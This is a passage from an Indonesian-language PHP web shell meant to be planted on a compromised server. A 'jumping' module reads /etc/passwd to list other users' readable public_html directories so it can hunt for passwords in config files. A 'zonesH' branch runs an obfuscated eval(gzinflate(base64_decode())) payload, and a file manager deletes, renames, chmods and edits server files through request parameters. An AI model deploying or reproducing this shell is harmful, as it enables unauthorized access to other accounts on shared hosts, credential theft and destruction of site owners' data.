1973. elseif(isset($_GET['x']) && ($_GET['x'] == 'jumping')){
1974. ?>
1975. <form action="?path=<?php echo $pwd; ?>&amp;x=jumping" method="post">
1976. <?php
1977. //radable public_html
1978. ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>');
1979. set_time_limit(0);
1980. ###################
1981. @$passwd = fopen('/etc/passwd','r');
1982. if (!$passwd) { die('<br>[-] Error : coudn`t read /etc/passwd'); }
1983. $pub = array();
1984. $users = array();
1985. $conf = array();
1986. $i = 0;
1987. while(!feof($passwd))
1988. {
1989. $str = fgets($passwd);
1990. if ($i > 35)
1991. {
1992. $pos = strpos($str,':');
1993. $username = substr($str,0,$pos);
1994. $dirz = '/home/'.$username.'/public_html/';
1995. if (($username != ''))
1996. {
1997. if (is_readable($dirz))
1998. {
1999. array_push($users,$username);
2000. array_push($pub,$dirz);
2001. }
2002. }
2003. }
2004. $i++;
2005. }
2006. ###################
2007. echo '<br><br></center></center>';
2008. echo "<font class='rapihbanget'>[+] Founded ".sizeof($users)." entrys in /etc/passwd\n"."<br /></font>";
2009. echo "<font class='rapihbanget'>[+] Founded ".sizeof($pub)." readable public_html directories\n"."<br /></font>";
2010. echo "<font class='rapihbanget'>[~] Searching for passwords in config files...<br /><br /></font>";
2011. foreach ($users as $user)
2012. {
2013. $path = "/home/$user/public_html/";
2014. echo "<font class='rapihbanget'><a href='?path&#61;$path' target='_blank' font-weight:bold; color:#F80;'>$path</a><br></font>";
2015. }
2016. echo "<br /><font class='rapihbanget'>[+] Complete...\n"."<br /></font>";
2017. echo "<font class='rapihbanget'>[+] Monggo Sikat Boz!\n"."<br /></font>";
2018. echo '<br><br></b></body><center>';
2019. }
2020. ///////////////
2021. elseif(isset($_GET['x']) && ($_GET['x'] == 'zonesH')){ echo "<br/><br/>";@eval(gzinflate(base64_decode($zoneH))); "</div>"; }
2022. /////////////
2023.  
2024. /*
2025. File Manager
2026. Dimulai Dari Sini
2027. */
2028. else{
2029. echo '<table><br />';
2030. ////////////////////////////////////////////////////////////////////////
2031. /////////////////////////////////////////////////////////////////////////
2032.  
2033. echo "<center>";
2034. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
2035. if($_POST['type'] == 'dir'){
2036. if(rmdir($_POST['path'])){
2037. echo '<script>alert("Delete Dir Sukses!");</script>';
2038. }else{
2039. echo '<script>alert("Delete Dir Gagal!");</script>';
2040. }
2041. }elseif($_POST['type'] == 'file'){
2042. if(unlink($_POST['path'])){
2043. echo '<script>alert("Delete File Sukses!");</script>';
2044. }else{
2045. echo '<script>alert("Delete File Gagal!");</script>';
2046. }
2047. }
2048. }
2049. echo '</center>';
2050. $scandir = scandir($path);
2051. echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
2052. ';
2053.  
2054. foreach($scandir as $dir){
2055. if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
2056. echo "<tr>
2057. <td><a style='color:white; font-family:Homenaje;' href=\"?path=$path/$dir\">$dir</a></td><td><center style='color:orange; font-family:Homenaje;'>--</center></td>
2058. <td><center>";
2059. if(is_writable("$path/$dir")) echo "<font style='color:springgreen; font-family:Homenaje;'>";
2060. elseif(!is_readable("$path/$dir")) echo "<font style='color:red; font-family:Homenaje;'>";
2061. echo perms("$path/$dir");
2062. if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
2063.  
2064. echo "</center></td>
2065. <td width='26%'><center><form method=\"POST\" action=\"?option&path=$path\">
2066. <select class='bordergaya' name=\"opt\">
2067. <option value=\"\"></option>
2068. <option value=\"delete\">Delete</option>
2069. <option value=\"chmod\">Chmod</option>
2070. <option value=\"rename\">Rename</option>
2071. </select>
2072. <input type=\"hidden\" name=\"type\" value=\"dir\">
2073. <input type=\"hidden\" name=\"name\" value=\"$dir\">
2074. <input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
2075. <input class='bordergaya' type=\"submit\" value=\"Execute\" />
2076. </form></center></td>
2077. </tr>";
2078. }
2079. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
2080. foreach($scandir as $file){
2081. if(!is_file("$path/$file")) continue;
2082. $size = filesize("$path/$file")/1024;
2083. $size = round($size,3);
2084. if($size >= 1024){
2085. $size = round($size/1024,2).' MB';
2086. }else{
2087. $size = $size.' KB';
2088. }
2089.  
2090. echo "<tr>
2091. <td><a style='color:white; font-family:Homenaje;' href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
2092. <td><center style='color:orange; font-family:Homenaje;'>".$size."</center></td>
2093. <td><center>";
2094. if(is_writable("$path/$file")) echo "<font style='color:springgreen; font-family:Homenaje;'>";
2095. elseif(!is_readable("$path/$file")) echo "<font style='color:red; font-family:Homenaje;'>";
2096. echo perms("$path/$file");
2097. if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
2098. echo "</center></td>
2099. <td width='26%'><center><form method=\"POST\" action=\"?option&path=$path\">
2100. <select class='bordergaya' name=\"opt\">
2101. <option value=\"\"></option>
2102. <option value=\"delete\">Delete</option>
2103. <option value=\"chmod\">Chmod</option>
2104. <option value=\"rename\">Rename</option>
2105. <option value=\"edit\">Edit</option>
2106. </select>
2107. <input type=\"hidden\" name=\"type\" value=\"file\">
2108. <input type=\"hidden\" name=\"name\" value=\"$file\">
2109. <input type=\"hidden\" name=\"path\" value=\"$path/$file\">
2110. <input class='bordergaya' type=\"submit\" value=\"Execute\" />
2111. </form></center></td>
2112. </tr>";
2113. }
2114. echo '</table>
2115. </div>';
2116.  
2117. }
2118. ///////////////////////////////////////////////////////////////////////
2119. ////////////////////////////////////////////////////////////////////////
2120.  
2121. ?>
2122. <br/><br/>
2123. <div id="bawah">
2124. <script language="JavaScript">
2125. Year=new Date();
2126. var copyright=Year.getUTCFullYear(); document.write("<tabel style='padding:3px 6px; border:2px solid #2d2b2b; border-radius:5px;'><tr><td><font face='Fredericka the Great' size='3px' color='gray'> "+ copyright +" </font></td></tr></table>"); </script>
2127. </div>
2128. </BODY></html>